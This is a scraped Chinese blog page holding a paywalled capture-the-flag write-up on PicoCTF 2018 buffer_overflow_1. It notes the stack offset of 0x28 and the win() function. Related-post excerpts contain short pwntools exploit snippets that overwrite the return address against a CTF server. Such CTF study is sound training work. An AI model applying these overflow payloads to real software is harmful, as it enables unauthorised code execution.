PicoCTF_2018_buffer_overflow_1

最新推荐文章于 2024-09-01 20:56:28 发布
最新推荐文章于 2024-09-01 20:56:28 发布
阅读量502 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0sway/article/details/121588147
版权

PicoCTF_2018_buffer_overflow_1

使用checksec查看:
在这里插入图片描述
保护机制全关,看起来没啥难度。

扔进IDA中查看:
在这里插入图片描述
主函数中给出了漏洞函数,跟进查看:
在这里插入图片描述
gets()函数,栈溢出,s距离ebp0x28

查看下这题的字符串可以发现函数win()
在这里插入图片描述
能够直接获取到flag,直接秒了这题。

exp:

from pwn import
最低0.47元/天 解锁文章
PicoCTF_2018_buffer_overflow_2
m0sway的博客
11-29 424
PicoCTF_2018_buffer_overflow_2 使用checksec查看: 开启了栈不可执行,放进IDA中查看,其实和PicoCTF_2018_buffer_overflow_1没啥变化 唯一做了变动的是win()函数: 上一题是直接跳到这个函数就能读取到flag,这题需要给win()函数两个参数a1、a2 a1需要等于0xDEADBEEF a2需要等于0xDEADC0DE 才能读取到flag。 那么直接传参即可,秒了。 exp: from pwn import * #start r
picoctf_2018_buffer overflow 2 1
weixin_74861133的博客
03-12 390
主要漏洞在vuln()里面,gets函数有栈溢出漏洞,s距离ebp为0x6C又发现可疑函数win(),点进去看发现只要该函数的两个参数a1和a2满足相应的条件(a1 == -559038737 && a2 == -559038242)就可以直接打印flag。将条件中的数字转换为16进制为a1 == 0xDEADBEEF && a2 == 0xDEADC0DE。故该题思路为利用栈溢出溢出返回地址到win函数然后传递正确的参数a1与a2使其输出flag,先上exp。
BUUCTF:PicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1424
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 362
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1
Y_peak的博客
03-16 390
[BUUCTF-pwn]——picoctf_2018_buffer overflow 1 简单的栈溢出, 返回地址,设置为win就好 exploit from pwn import * p = remote("node3.buuoj.cn",25059) payload = 'a' * (0x28 + 4) + p32(0x080485CB) p.sendline(payload) p.interactive()
【CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1481
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
20.5.23pwn做题记录
eeeeeight的博客
05-24 198
cmcc_simplerop 一开始以为是用里面定义的"puts函数"打印函数地址做的,然后失败了:LibcSearcher找不到匹配的libc,猜测可能是因为他的"puts"函数是自定义的(因为没有在plt表中),所以打印出的地址不正确? 既然不能像以前一样使用system函数,那就再试一下int 80h结果真有函数 然后就是编写exp了 from pwn import * from LibcSearcher import LibcSearcher #sh=process('./sim') sh=remo
picoctf-2018-buffer-overflow-1
m0_73743784的博客
09-01 395
非常简单的ret2text,但是其他的信息稍微有点多。
picoctf_2018_buffer overflow 1
个人笔记
04-26 138
【代码】picoctf_2018_buffer overflow 1
Lab1-Buffer OverFlow
11-10
Lab1-Buffer OverFlow,包含代码、实验说明和论文。
IDA逆向分析缓冲区溢出攻击漏洞实例.rar
03-12
很好的逆向分析的学习资料!!! https://blog.youkuaiyun.com/wlwdecs_dn/article/details/114708775
BUUCTF pwn——PicoCTF_2018_buffer_overflow 1
CNS-Enterprise BCC-1701-J
05-13 132
BUUCTF 做题练习
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 453
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
[BUUCTF]PWN——picoctf_2018_buffer overflow 1
BangSen1的博客
03-20 388
picoctf_2018_buffer overflow 1 例行检查,32位,没开启保护 运行一下 用IDA打开,检索字符串,看到了flag.txt,跟进找到了调用flag.txt的函数 win_addr=0x80485CB gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import* r=remote('node3.buuoj.cn',26185) win_addr=0x80485CB payload='a'*(0x28+4)+p32(win_addr)
picoctf Pwn buffer overflow 1
MrTreebook的博客
04-04 261
picoctf Pwn buffer overflow 11.IDA反编译看一下2.checksec检查3.检查后门函数4.看一下vuln函数5.利用思路6.exp 1.IDA反编译看一下 2.checksec检查 3.检查后门函数 4.看一下vuln函数 5.利用思路 在vuln函数中有一个gets()函数可以溢出 将放回地址覆盖成win()函数的地址即可 没有canary和pie的保护利用起来非常简单 6.exp from pwn import * p = remote("saturn.pi
BUUCTF:PicoCTF_2018_buffer_overflow_2
weixin_51055545的博客
01-05 981
例行检查程序: 还是32位程序,没有canary,很可能是溢出类的。 放到IDA中: 主函数没什么特别,进入vuln()函数看一下: 果然存在溢出漏洞,两次溢出,直接去get shell 第一次溢出去泄露libc地址,第二次溢出get shell 这里我选怎printf()函数作为泄露的函数,同样也可以选择puts()函数, 构造payload : io.recvuntil(':') payload = 'A'*0x6c payload += p32(0) payload += p32(
关于缓冲区溢出(Buffer Overflow)
yiyeqinghuasoon
09-06 690
接触黑客的同志们经常遇到,使用一些扫描工具扫描的时候,会得到一些缓冲区溢出的漏洞,但是怎么利用自己是一团雾水 网上很少有相关的工具,也很少有相关的文章,下面我们就说说这个“窿西”吧 [蛋痛]文章丢失了一次,优快云需要改进暂存机制 用VB的便宜不太明白“缓冲区”,当然这一点对熟悉API的朋友有一定改善,缓冲区就是一段内存,通俗这么讲吧。 我们给局部变量或者全局变量赋值时,变量的内存大小...
PicoCTF_2018_buffer_overflow_3(本地固定canary的爆破)
seaaseesa的博客
05-01 896
PicoCTF_2018_buffer_overflow_3 用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。 由于文件内容不变,所以,我们可以直接爆破。 #coding:utf8 from pwn import * shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, passwor...
ctf pwn
最新发布
04-02
### CTF Pwn 题目解法与学习资源 CTF(Capture The Flag)比赛中的 Pwn 类型题目主要涉及二进制漏洞挖掘与利用,目标通常是通过发现并利用程序中存在的漏洞获取 shell 或读取 flag 文件。以下是关于 Pwn 题目解法的学习方向以及一些推荐的资源。 #### 1. 基础概念 Pwn 题目通常基于以下几种常见的漏洞类型: - **缓冲区溢出 (Buffer Overflow)**:攻击者可以通过覆盖返回地址或其他重要数据来控制程序执行流程[^1]。 - **格式化字符串漏洞 (Format String Vulnerability)**:允许攻击者读写内存中的特定位置[^4]。 - **堆溢出 (Heap Overflow)** 和 **UAF (Use After Free)**:这些漏洞发生在动态分配的内存管理上[^3]。 - **整数溢出 (Integer Overflow)** 和其他逻辑错误也可能被用来实现任意代码执行[^2]。 #### 2. 工具介绍 熟悉必要的工具对于解决 Pwn 题目至关重要: - **GDB/Pwntools/GEF**: GDB 是调试 Linux 程序的标准工具;Pwntools 提供了一个 Python 库用于快速开发 exploit 脚本;GEF 则是一个增强版插件,简化复杂操作。 - **ROPgadget/ropper**: 这些工具帮助寻找可用于 Return-Oriented Programming 的 gadget。 #### 3. 实战技巧 针对不同类型的漏洞有不同的应对策略: - 对于简单的 Buffer Overflow, 可尝试直接覆盖 EIP 并跳转至 shellcode 地址。 - 当存在 NX bit 保护时,则可能需要用到 ROP 技术绕过此限制。 - 如果遇到 ASLR 开启的情况,考虑泄露 libc 基址或者某些固定偏移量的信息以便计算所需地址。 #### 4. 推荐学习路径 初学者可以从基础环境搭建开始逐步深入理解各知识点: - 安装虚拟机运行靶场练习环境如 picoCTF、OverTheWire 等提供入门级挑战项目。 - 学习汇编语言基础知识尤其是 x86/x64 架构下的指令集。 - 练习编写基本的小型 C/C++ 程序并通过逆向工程掌握其内部工作机制。 - 尝试完成公开平台上的简单 Pwn 题目积累实战经验。 ```python from pwn import * context(arch='i386', os='linux') elf = ELF('./vuln') io = process(elf.path) payload = b'A' * cyclic_find(b'BAA') + pack(0xdeadbeef) io.sendline(payload) io.interactive() ``` 上述脚本展示了如何使用 `pwntools` 来构建 payload 攻击具有已知 offset 的 buffer overflow 漏洞的应用程序实例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值